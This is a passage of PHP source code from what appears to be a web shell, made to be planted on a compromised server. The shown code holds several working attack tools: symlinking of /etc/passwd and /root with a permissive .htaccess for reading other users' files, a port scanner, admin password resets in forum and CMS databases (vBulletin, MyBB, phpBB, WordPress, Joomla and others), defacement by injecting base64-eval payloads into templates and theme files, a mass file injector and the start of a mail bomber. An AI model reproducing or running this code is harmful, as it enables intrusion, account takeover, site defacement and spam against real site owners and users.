2818 <td align="center" colspan="2"><input type="button" onClick="getname(sitename.value)" value=" Get IT " class="but"></td>
2819 </tr>
2820 <tr>
2821 <td colspan=2 align=center><div style="width:250px;" id="showsite"></div></td>
2822 </tr>
2823 </table>
2824 </form>
2825 </div>
2826 <?php
2827 $TEST=@file('/etc/passwd');
2828 if ($TEST)
2829 {
2830 @mkdir("dhanush",0777);
2831 @chdir("dhanush");
2832 execmd("ln -s /root");
2833
2834$file3 = 'Options all
2835 DirectoryIndex Sux.html
2836 AddType text/plain .php
2837 AddHandler server-parsed .php
2838 AddType text/plain .html
2839 AddHandler txt .html
2840 Require None
2841 Satisfy Any
2842 ';
2843 $fp3 = fopen('.htaccess','w');
2844 $fw3 = fwrite($fp3,$file3);
2845 @fclose($fp3);
2846
2847 echo "<table align=center border=1 style='width:40%;border-color:#333333;'><tr><td align=center><font size=4 >S. No.</font></td><td align=center><font size=4 >Users</font></td><td align=center><font size=3 >Symlink</font></td></tr>";
2848
2849
2850 $dcount = 1;
2851 $file = fopen("/etc/passwd", "r");
2852 //Output a line of the file until the end is reached
2853 while(!feof($file))
2854 {
2855 $s = fgets($file);
2856 $matches = array();
2857 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2858 $matches = str_replace("home/","",$matches[1]);
2859 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
2860 continue;
2861 echo "<tr><td align=center><font size=3 class=txt>" . $dcount . "</td><td align=center><font size=3 class=txt>" . $matches . "</td>";
2862 echo "<td align=center><font size=3 class=txt><a href=".$url."dhanush/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
2863 $dcount++;
2864 }
2865 fclose($file);
2866
2867 echo "</table>";
2868 }
2869 else
2870 {
2871 @mkdir("dhanush",0777);
2872 @chdir("dhanush");
2873 execmd("ln -s / root");
2874 $file3 = 'Options all
2875 DirectoryIndex Sux.html
2876 AddType text/plain .php
2877 AddHandler server-parsed .php
2878 AddType text/plain .html
2879 AddHandler txt .html
2880 Require None
2881 Satisfy Any
2882 ';
2883 $fp3 = fopen('.htaccess','w');
2884 $fw3 = fwrite($fp3,$file3);
2885 @fclose($fp3);
2886
2887 echo "<table align=center border=1 style='width:40%;border-color:#333333;'><tr><td align=center><font size=4 >S. No.</font></td><td align=center><font size=4 >Users</font></td><td align=center><font size=3 >Symlink</font></td></tr>";
2888
2889 $temp = "";
2890 $val1 = 0;
2891 $val2 = 1000;
2892 for(;$val1 <= $val2;$val1++)
2893 {
2894 $uid = @posix_getpwuid($val1);
2895 if ($uid)
2896 $temp .= join(':',$uid)."\n";
2897 }
2898 echo '<br/>';
2899 $temp = trim($temp);
2900
2901 $file5 = fopen("test.txt","w");
2902 fputs($file5,$temp);
2903 fclose($file5);
2904
2905 $dcount = 1;
2906 $file = fopen("test.txt", "r");
2907 while(!feof($file))
2908 {
2909 $s = fgets($file);
2910 $matches = array();
2911 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2912 $matches = str_replace("home/","",$matches[1]);
2913 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
2914 continue;
2915 echo "<tr><td align=center><font size=3 class=txt>" . $dcount . "</td><td align=center><font size=3 class=txt>" . $matches . "</td>";
2916 echo "<td align=center><font size=3 class=txt><a href=".$url."dhanush/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
2917 $dcount++;
2918 }
2919 fclose($file);
2920 echo "</table>";
2921 unlink("test.txt");
2922 }
2923 }
2924 else
2925 echo "<center><font size=4 >Cannot create Symlink</font></center>";
2926 }
2927}
2928else if(isset($_GET['host']) && isset($_GET['protocol']))
2929{
2930 echo "Open Ports: ";
2931 $host = $_GET['host'];
2932 $proto = $_GET['protocol'];
2933 $myports = array("21","22","23","25","59","80","113","135","445","1025","5000","5900","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
2934 for($current = 0; $current <= 23; $current++)
2935 {
2936 $currents = $myports[$current];
2937 $service = getservbyport($currents, $proto);
2938 // Try to connect to port
2939 $result = fsockopen($host, $currents, $errno, $errstr, 1);
2940 // Show results
2941 if($result)
2942 echo "<font class=txt>$currents, </font>";
2943 }
2944}
2945else if(isset($_REQUEST['forumpass']))
2946{
2947 $localhost = $_GET['f1'];
2948 $database = $_GET['f2'];
2949 $username = $_GET['f3'];
2950 $password = $_GET['f4'];
2951 $prefix = $_GET['prefix'];
2952 $newpass = $_GET['newpass'];
2953 $uid = $_GET['uid'];
2954
2955 if($_GET['forums'] == "vb")
2956 {
2957 $newpass = $_GET['newipbpass'];
2958 $uid = $_GET['ipbuid'];
2959 $con = mysql_connect($localhost,$username,$password);
2960 $db = mysql_select_db($database,$con);
2961 $salt = "eghjghrtd";
2962 $newpassword = md5(md5($newpass) . $salt);
2963 if($prefix == "" || $prefix == null)
2964 $sql = mysql_query("update user set password = '$newpassword', salt = '$salt' where userid = '$uid'");
2965 else
2966 $sql = mysql_query("update ".$prefix."user set password = '$newpassword', salt = '$salt' where userid = '$uid'");
2967 if($sql)
2968 {
2969 mysql_close($con);
2970 echo "<font class=txt>Password Changed Successfully</font>";
2971 }
2972 else
2973 echo "Cannot Change Password";
2974 }
2975 else if($_GET['forums'] == "mybb")
2976 {
2977 $newpass = $_GET['newipbpass'];
2978 $uid = $_GET['ipbuid'];
2979 $con = mysql_connect($localhost,$username,$password);
2980 $db = mysql_select_db($database,$con);
2981 $salt = "jeghj";
2982 $newpassword = md5(md5($salt).md5($newpass));
2983 if($prefix == "" || $prefix == null)
2984 $sql = mysql_query("update mybb_users set password = '$newpassword', salt = '$salt' where uid = '$uid'");
2985 else
2986 $sql = mysql_query("update ".$prefix."users set password = '$newpassword', salt = '$salt' where uid = '$uid'");
2987 if($sql)
2988 {
2989 mysql_close($con);
2990 echo "<font class=txt>Password Changed Successfully</font>";
2991 }
2992 else
2993 echo "Cannot Change Password";
2994 }
2995 else if($_GET['forums'] == "smf")
2996 {
2997 $newpass = $_GET['newipbpass'];
2998 $uid = $_GET['ipbuid'];
2999 $con = mysql_connect($localhost,$username,$password);
3000 $db = mysql_select_db($database,$con);
3001
3002 if($prefix == "" || $prefix == null)
3003 {
3004 $result = mysql_query("select member_name from smf_members where id_member = $uid");
3005 $row = mysql_fetch_array($result);
3006 $membername = $row['member_name'];
3007 $newpassword = sha1(strtolower($membername).$newpass);
3008 $sql = mysql_query("update smf_members set passwd = '$newpassword' where id_member = '$uid'");
3009 }
3010 else
3011
3012 {
3013 $result = mysql_query("select member_name from ".$prefix."members where id_member = $uid");
3014 $row = mysql_fetch_array($result);
3015 $membername = $row['member_name'];
3016 $newpassword = sha1(strtolower($membername).$newpass);
3017 $sql = mysql_query("update ".$prefix."members set passwd = '$newpassword' where id_member = '$uid'");
3018 }
3019 if($sql)
3020 {
3021 mysql_close($con);
3022 echo "<font class=txt>Password Changed Successfully</font>";
3023 }
3024 else
3025 echo "Cannot Change Password";
3026 }
3027 else if($_GET['forums'] == "phpbb")
3028 {
3029 $newpass = $_POST['newipbpass'];
3030 $uid = $_POST['ipbuid'];
3031 $con = mysql_connect($localhost,$username,$password);
3032 $db = mysql_select_db($database,$con);
3033
3034 $newpassword = md5($newpass);
3035 if(empty($prefix) || $prefix == null)
3036 $sql = mysql_query("update phpb_users set user_password = '$newpassword' where user_id = '$uid'");
3037 else
3038 $sql = mysql_query("update ".$prefix."users set user_password = '$newpassword' where user_id = '$uid'");
3039 if($sql)
3040 {
3041 mysql_close($con);
3042 echo "<font class=txt>Password Changed Successfully</font>";
3043 }
3044 else
3045 echo "Cannot Change Password";
3046 }
3047 else if($_GET['forums'] == "ipb")
3048 {
3049 $newpass = $_POST['newipbpass'];
3050 $uid = $_POST['ipbuid'];
3051 $con = mysql_connect($localhost,$username,$password);
3052 $db = mysql_select_db($database,$con);
3053 $salt = "eghj";
3054 $newpassword = md5(md5($salt).md5($newpass));
3055 if($prefix == "" || $prefix == null)
3056 $sql = mysql_query("update members set members_pass_hash = '$newpassword', members_pass_salt = '$salt' where member_id = '$uid'");
3057 else
3058 $sql = mysql_query("update ".$prefix."members set members_pass_hash = '$newpassword', members_pass_salt = '$salt' where member_id = '$uid'");
3059 if($sql)
3060 {
3061 mysql_close($con);
3062 echo "<font class=txt>Password Changed Successfully</font>";
3063 }
3064 else
3065 echo "Cannot Change Password";
3066 }
3067 else if($_GET['forums'] == "wp")
3068 {
3069 $uname = $_GET['uname'];
3070 $con = mysql_connect($localhost,$username,$password);
3071 $db = mysql_select_db($database,$con);
3072
3073 $newpassword = md5($newpass);
3074 $sql = mysql_query("update ".$prefix."users set user_pass = '$newpassword', user_login = '$uname'");
3075 if($sql)
3076 {
3077 mysql_close($con);
3078 echo "<font class=txt>Password Changed Successfully</font>";
3079 }
3080 else
3081 echo "Cannot Change Password";
3082 }
3083 else if($_GET['forums'] == "joomla")
3084 {
3085 $newjoomlapass = $_GET['newjoomlapass'];
3086 $joomlauname = $_GET['username'];
3087 $con = mysql_connect($localhost,$username,$password);
3088 $db = mysql_select_db($database,$con);
3089
3090 $newpassword = md5($newjoomlapass);
3091 $sql = mysql_query("update ".$prefix."users set password = '$newpassword', username = '$joomlauname'");
3092 if($sql)
3093 {
3094 mysql_close($con);
3095 echo "<font class=txt>Password Changed Successfully</font>";
3096 }
3097 else
3098 echo "Cannot Change Password";
3099 }
3100}
3101else if(isset($_POST['forumdeface']))
3102{
3103 $localhost = $_POST['f1'];
3104 $database = $_POST['f2'];
3105 $username = $_POST['f3'];
3106 $password = $_POST['f4'];
3107 $index = $_POST['index'];
3108 $prefix = $_POST['tableprefix'];
3109
3110 if($_POST['forumdeface'] == "vb")
3111 {
3112 $con =@ mysql_connect($localhost,$username,$password);
3113 $db =@ mysql_select_db($database,$con);
3114 $index=str_replace('"','\\"',$index);
3115 $attack = "{\${eval(base64_decode(\'";
3116 $attack .= base64_encode("echo \"$index\";");
3117 $attack .= "\'))}}{\${exit()}}</textarea>";
3118 if($prefix == "" || $prefix == null)
3119 $query = "UPDATE template SET template = '$attack'";
3120 else
3121 $query = "UPDATE ".$prefix."template SET template = '$attack'";
3122 $result =@ mysql_query($query,$con);
3123 if($result)
3124 echo "<center><font class=txt size=4><blink>Vbulletin Forum Defaced Successfully</blink></font></center>";
3125 else
3126 echo "<center><font size=4><blink>Cannot Deface Vbulletin Forum</blink></font></center>";
3127 }
3128 else if($_POST['forumdeface'] == "mybb")
3129 {
3130 $con =@ mysql_connect($localhost,$username,$password);
3131 $db =@ mysql_select_db($database,$con);
3132 $attack = "{\${eval(base64_decode(\'";
3133 $attack .= base64_encode("echo \"$index\";");
3134 $attack .= "\'))}}{\${exit()}}</textarea>";
3135 $attack = str_replace('"',"\\'",$attack);
3136
3137 if($prefix == "" || $prefix == null)
3138 $query = "UPDATE mybb_templates SET template = '$attack'";
3139 else
3140 $query = "UPDATE ".$prefix."templates SET template = '$attack'";
3141 $result =@ mysql_query($query,$con);
3142 if($result)
3143 echo "<center><font class=txt size=4><blink>Mybb Forum Defaced Successfully</blink></font></center>";
3144 else
3145 echo "<center><font size=4><blink>Cannot Deface Mybb Forum</blink></font></center>";
3146 }
3147 else if($_POST['forumdeface'] == "smf")
3148 {
3149 $head = $_POST['head'];
3150 $catid = $_POST['f5'];
3151
3152 $con =@ mysql_connect($localhost,$username,$password);
3153 $db =@ mysql_select_db($database,$con);
3154 if($prefix == "" || $prefix == null)
3155 $query = "UPDATE boards SET name='$head', description='$index' WHERE id_cat='$catid'";
3156 else
3157 $query = "UPDATE ".$prefix."boards SET name='$head', description='$index' WHERE id_cat='$catid'";
3158 $result =@ mysql_query($query,$con);
3159 if($result)
3160 echo "<center><font class=txt size=4><blink>SMF Forum Index Changed Successfully</blink></font></center>";
3161 else
3162 echo "<center><font size=4><blink>Cannot Deface SMF Forum</blink></font></center>";
3163 }
3164 else if($_POST['forumdeface'] == "ipb")
3165 {
3166 $head = $_POST['head'];
3167 $catid = $_POST['f5'];
3168
3169 $IPB = "forums";
3170 $con =@ mysql_connect($localhost,$username,$password);
3171 $db =@ mysql_select_db($database,$con);
3172 if($prefix == "" || $prefix == null)
3173 $result =@mysql_query($query = "UPDATE $IPB SET name = '$head', description = '$index' where id = '$catid'");
3174 else
3175 $result =@mysql_query($query = "UPDATE $prefix.$IPB SET name = '$head', description = '$index' where id = '$catid'");
3176 if($result)
3177 echo "<center><font class=txt size=4><blink>Forum Defaced Successfully</blink></font></center>";
3178 else
3179
3180 echo "<center><font size=4><blink>Cannot Deface Forum</blink></font></center>";
3181 }
3182 else if($_POST['forumdeface'] == "wp")
3183 {
3184 $site_url = $_POST['siteurl'];
3185 $index = urlencode($index);
3186 $con =@ mysql_connect($localhost,$username,$password);
3187 $db =@ mysql_select_db($database,$con);
3188 $req1 = mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '$1$42REgxSR$.tLV4PSbQmCKsisyCSyhq.'");
3189 echo("<br>[+] Changing admin password to 123456789<br>");
3190
3191 if($req1)
3192 {
3193 $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");
3194 $data = mysql_fetch_array($req);
3195 if(empty($site_url))
3196 $site_url=$data["option_value"];
3197 $output .= "Site : ".$site_url."<br>";
3198
3199 $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='template'");
3200 $data = mysql_fetch_array($req);
3201 $template = $data["option_value"];
3202
3203 $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='current_theme'");
3204 $data = mysql_fetch_array($req);
3205 $current_theme = $data["option_value"];
3206
3207 $useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
3208 $url2=$site_url."/wp-login.php";
3209
3210 $ch = curl_init();
3211 curl_setopt($ch, CURLOPT_URL, $url2);
3212 curl_setopt($ch, CURLOPT_POST, 1);
3213 curl_setopt($ch, CURLOPT_POSTFIELDS,"log=admin&pwd=123456789&rememberme=forever&wp-submit=Log In&testcookie=1");
3214 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3215 curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
3216 curl_setopt($ch, CURLOPT_HEADER, 0);
3217 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
3218 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3219 curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
3220 curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
3221 $buffer = curl_exec($ch);
3222
3223 $pos = strpos($buffer,"action=logout");
3224 if($pos === false) {
3225 $output.= "[-] Successful Login<br />";
3226 } else {
3227 $output.= "[+] Successful Login<br />";
3228 }
3229
3230 $url2=$site_url.'/wp-admin/theme-editor.php?file=index.php&theme='.urlencode($template);
3231 curl_setopt($ch, CURLOPT_URL, $url2);
3232 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
3233 curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
3234 curl_setopt($ch, CURLOPT_HEADER, 0);
3235 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3236 curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
3237 curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
3238 $buffer0 = curl_exec($ch);
3239
3240 $_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
3241 $_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');
3242
3243 if(substr_count($_file,"index.php") != 0)
3244 {
3245 $url2=$site_url."/wp-admin/theme-editor.php";
3246 curl_setopt($ch, CURLOPT_URL, $url2);
3247 curl_setopt($ch, CURLOPT_POST, 1);
3248 curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".$index."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");
3249 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3250 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3251 curl_setopt($ch, CURLOPT_HEADER, 0);
3252 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3253 curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
3254 curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
3255 $buffer = curl_exec($ch);
3256 curl_close($ch);
3257
3258 $pos = strpos($buffer,'<div id="message" class="updated">');
3259 $cond = 0;
3260 if($pos === false) {
3261 $output.= "<center><font size=4><blink>Cannot Deface Wordpress</blink></font></center>";
3262 } else {
3263 $output.= "<center><font class=txt size=4><blink>Wordpress Defaced Successfully</blink></font></center>";
3264 $cond = 1;
3265 }
3266 }
3267 else
3268 {
3269 $url2=$site_url.'/wp-admin/theme-editor.php?file=/themes/'.$template.'/index.php&theme='.urlencode($current_theme).'&dir=theme';
3270 curl_setopt($ch, CURLOPT_URL, $url2);
3271 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
3272 curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
3273 curl_setopt($ch, CURLOPT_HEADER, 0);
3274 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3275 curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
3276 curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
3277 $buffer0 = curl_exec($ch);
3278
3279 $_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
3280 $_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');
3281
3282
3283 $url2=$site_url."/wp-admin/theme-editor.php";
3284 curl_setopt($ch, CURLOPT_URL, $url2);
3285 curl_setopt($ch, CURLOPT_POST, 1);
3286 curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".$index."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");
3287 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3288 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3289 curl_setopt($ch, CURLOPT_HEADER, 0);
3290 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3291 curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
3292 curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
3293 $buffer = curl_exec($ch);
3294 curl_close($ch);
3295
3296 $pos = strpos($buffer,'<div id="message" class="updated">');
3297 $cond = 0;
3298 if($pos === false) {
3299 $output.= "<center><font size=4><blink>Cannot Deface Wordpress</blink></font></center>";
3300 } else {
3301 $output.= "<center><font class=txt size=4><blink>Wordpress Defaced Successfully</blink></font></center>";
3302 $cond = 1;
3303 }
3304 }
3305 } else {
3306 $output.= "[-] DB Error<br />";
3307 }
3308 echo $output;
3309 global $base_path;
3310 unlink($base_path.'COOKIE.txt');
3311 }
3312 else if($_POST['forumdeface'] == "joomla")
3313 {
3314 $site_url = $_POST['siteurl'];
3315 $dbprefix = $_POST['tableprefix'];
3316 $dbname = $_POST['f2'];
3317 $h="<? echo(stripslashes(base64_decode('".urlencode(base64_encode(str_replace("'","'",($_POST['index']))))."'))); exit; ?>";
3318
3319 $co=randomt();
3320
3321 $link=mysql_connect($localhost,$username,$password) ;
3322 mysql_select_db($dbname,$link);
3323
3324 $tryChaningInfo = mysql_query("UPDATE ".$dbprefix."users SET username ='admin' , password = '2a9336f7666f9f474b7a8f67b48de527:DiWqRBR1thTQa2SvBsDqsUENrKOmZtAX'");
3325
3326 $req =mysql_query("SELECT * from `".$dbprefix."extensions` ");
3327
3328 if ( $req )
3329 {
3330 $req =mysql_query("SELECT * from `".$dbprefix."template_styles` WHERE client_id='0' and home='1'");
3331 $data = mysql_fetch_array($req);
3332 $template_name=$data["template"];
3333
3334 $req =mysql_query("SELECT * from `".$dbprefix."extensions` WHERE name='".$template_name."'");
3335 $data = mysql_fetch_array($req);
3336 $template_id=$data["extension_id"];
3337
3338 $url2=$site_url."/index.php";
3339
3340 $ch = curl_init();
3341 curl_setopt($ch, CURLOPT_URL, $url2);
3342 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3343 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3344 curl_setopt($ch, CURLOPT_HEADER, 1);
3345 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3346 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
3347 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
3348
3349
3350 $buffer = curl_exec($ch);
3351
3352 $return=entre2v2($buffer ,'<input type="hidden" name="return" value="','"');
3353 $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);
3354
3355
3356 $url2=$site_url."/index.php";
3357 $ch = curl_init();
3358 curl_setopt($ch, CURLOPT_URL, $url2);
3359 curl_setopt($ch, CURLOPT_POST, 1);
3360 curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&return=".$return."&".$hidden."=1");
3361 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3362 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3363 curl_setopt($ch, CURLOPT_HEADER, 0);
3364 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3365 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
3366 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
3367 $buffer = curl_exec($ch);
3368
3369 $pos = strpos($buffer,"com_config");
3370 if($pos === false)
3371 {
3372 echo("<br>[-] Login Error");
3373 exit;
3374 }
3375
3376 $url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
3377 $ch = curl_init();
3378 curl_setopt($ch, CURLOPT_URL, $url2);
3379 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3380 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3381 curl_setopt($ch, CURLOPT_HEADER, 0);
3382 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3383 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
3384
3385 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
3386 $buffer = curl_exec($ch);
3387
3388 $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);
3389 if(!$hidden2)
3390 {
3391 echo("<br>[-] index.php Not found in Theme Editor");
3392 exit;
3393 }
3394
3395 $url2=$site_url."/index.php?option=com_templates&layout=edit";
3396
3397 $ch = curl_init();
3398 curl_setopt($ch, CURLOPT_URL, $url2);
3399 curl_setopt($ch, CURLOPT_POST, 1);
3400 curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$h."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");
3401
3402 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3403 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3404 curl_setopt($ch, CURLOPT_HEADER, 0);
3405 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3406 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
3407 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
3408 $buffer = curl_exec($ch);
3409
3410 $pos = strpos($buffer,'<dd class="message message">');
3411 if($pos === false)
3412 {
3413 echo("<center><font size=4><blink>Cannot Deface Joomla</blink></font></center>");
3414 }
3415 else
3416 {
3417 echo("<center><font class=txt size=4><blink>Joomla Defaced Successfully</blink></font></center>");
3418 }
3419 }
3420 else
3421 {
3422 $req =mysql_query("SELECT * from `".$dbprefix."templates_menu` WHERE client_id='0'");
3423 $data = mysql_fetch_array($req);
3424 $template_name=$data["template"];
3425
3426 $url2=$site_url."/index.php";
3427 $ch = curl_init();
3428 curl_setopt($ch, CURLOPT_URL, $url2);
3429 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3430 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3431 curl_setopt($ch, CURLOPT_HEADER, 1);
3432 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3433 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
3434 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
3435 $buffer = curl_exec($ch);
3436
3437 $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);
3438
3439 $url2=$site_url."/index.php";
3440 $ch = curl_init();
3441 curl_setopt($ch, CURLOPT_URL, $url2);
3442 curl_setopt($ch, CURLOPT_POST, 1);
3443 curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&".$hidden."=1");
3444 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3445 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3446 curl_setopt($ch, CURLOPT_HEADER, 0);
3447 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3448 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
3449 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
3450 $buffer = curl_exec($ch);
3451
3452 $pos = strpos($buffer,"com_config");
3453
3454 if($pos === false)
3455 {
3456 echo("<br>[-] Login Error");
3457 exit;
3458 }
3459
3460 $url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;
3461 $ch = curl_init();
3462 curl_setopt($ch, CURLOPT_URL, $url2);
3463 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3464 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3465 curl_setopt($ch, CURLOPT_HEADER, 0);
3466 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3467 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
3468 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
3469 $buffer = curl_exec($ch);
3470
3471 $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);
3472
3473 if(!$hidden2)
3474 {
3475 echo("<br>[-] index.php Not found in Theme Editor");
3476 }
3477
3478 $url2=$site_url."/index.php?option=com_templates&layout=edit";
3479 $ch = curl_init();
3480 curl_setopt($ch, CURLOPT_URL, $url2);
3481 curl_setopt($ch, CURLOPT_POST, 1);
3482 curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$h."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");
3483 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3484 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3485 curl_setopt($ch, CURLOPT_HEADER, 0);
3486 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3487 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
3488 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
3489 $buffer = curl_exec($ch);
3490
3491 $pos = strpos($buffer,'<dd class="message message fade">');
3492 if($pos === false)
3493 {
3494 echo("<center><font size=4><blink>Cannot Deface Joomla</blink></font></center>");
3495 exit;
3496 }
3497 else
3498 {
3499 echo("<center><font class=txt size=4><blink>Joomla Defaced Successfully</blink></font></center>");
3500 }
3501 }
3502 }
3503}
3504else if(isset($_POST['pathtomass']) && $_POST['pathtomass'] != '' && isset($_POST['filetype']) && $_POST['filetype'] != '' && isset($_POST['mode']) && $_POST['mode'] != '' && isset($_POST['injectthis']) && $_POST['injectthis'] != '')
3505{
3506 $filetype = $_POST['filetype'];
3507
3508 $mode = "a";
3509
3510 if($_POST['mode'] == 'Apender')
3511 $mode = "a";
3512
3513 if($_POST['mode'] == 'Overwriter')
3514 $mode = "w";
3515
3516 if (is_dir($_POST['pathtomass']))
3517 {
3518 $lolinject = $_POST['injectthis'];
3519 $mypath = $_POST['pathtomass'] .$directorysperator. "*.".$filetype;
3520 if(substr($_POST['pathtomass'], -1) == "\\")
3521 $mypath = $_POST['pathtomass'] . "*.".$filetype;
3522 foreach (glob($mypath) as $injectj00)
3523 {
3524 /*if($injectj00 == getcwd().$_SERVER['SCRIPT_NAME'])
3525 continue;
3526 $fp=fopen($injectj00,$mode);
3527 if (fputs($fp,$lolinject))
3528 echo '<br><font class=txt size=3>'.$injectj00.' was injected<br></font>';
3529 else
3530 echo 'failed to inject '.$injectj00.'<br>';*/
3531 }
3532 $dirs = glob($_POST['pathtomass'] . '/*' , GLOB_ONLYDIR);
3533 foreach ($dirs as $dir)
3534 {
3535 injectdir($dir,$filetype,$mode,$lolinject);
3536 }
3537 }
3538 else
3539 echo '<b>'.$_POST['pathtomass'].' is not available!</b>';
3540}
3541else if(isset($_POST['mailfunction']))
3542{
3543 if($_POST['mailfunction'] == "dobombing")
3544 {
3545 if(isset($_POST['to']) && isset($_POST['subject']) && isset($_POST['message']) && isset($_POST['times']) && $_POST['to'] != '' && $_POST['subject'] != '' && $_POST['message'] != '' && $_POST['times'] != '')
3546 {
3547 $times = $_POST['times'];
3548 while($times--)
3549 {
3550 if(isset($_POST['padding']))
3551 {
3552 $fromPadd = rand(0,9999);
3553 $subjectPadd = " -- ID : ".rand(0,9999999);
3554 $messagePadd = "\n\n------------------------------\n".rand(0,99999999);
3555
3556 }
3557 $from = "hello$fromPadd@abcd.in";
